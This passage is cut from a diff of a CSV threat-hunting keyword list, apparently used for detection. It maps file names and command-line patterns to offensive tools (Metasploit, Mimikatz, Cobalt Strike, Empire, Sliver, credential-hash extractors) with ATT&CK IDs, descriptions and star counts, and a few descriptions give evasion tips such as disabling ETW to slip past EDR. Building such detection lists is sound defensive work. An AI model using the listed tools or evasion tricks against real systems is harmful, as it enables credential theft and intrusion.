and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*enum4linux*","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. 
It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","N/A","N/A","10","944","228","2023-05-09T22:54:24Z","2015-07-31T21:06:03Z" -"*enum4linux_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*enum4linux_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*enum4linux-ng -A -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*EnumCLR.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Enum-Creds*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enum-Creds*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*enumerate.cna*","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. 
adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*EnumerateAllDomainControllers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Enumerate-AllHighPrivilegePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
@@ -9908,37 +10057,37 @@ "*Enumeration/DesktopACL*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Enumeration\DesktopAC*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*env_var_spoofing_poc.cpp*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*eo.oe.kiwi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*eo.oe.kiwi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Erebus/*spacerunner*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*eRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*eRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*ES.Alan.Core/*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*EspressoCake/PPLDump_BOF*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Eternalblue-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*EternalBlue.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*eternalblue.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*EternalBlue.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*eternalblue.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Eternalblue-Doublepulsar*","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. 
[11]","T1055 - T1043 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","10","1055","545","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z" "*EternalHushFramework-*-SNAPSHOT.jar*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*EternalHushFramework-main*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*EternalHushMain.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*EternalHushWindow.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*ethereum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*ETWEventSubscription*Program.cs*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*ETWEventSubscription.exe* -ProcStart *","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*ETWEventSubscription.exe* -UserLogon*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ethereum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*ETWEventSubscription*Program.cs*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ETWEventSubscription.exe* -ProcStart *","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ETWEventSubscription.exe* -UserLogon*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*etw-fuck.exe *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*EtwHash.exe*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*EtwHash.git*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*ETWHash.sln*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*etwti-hook.*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
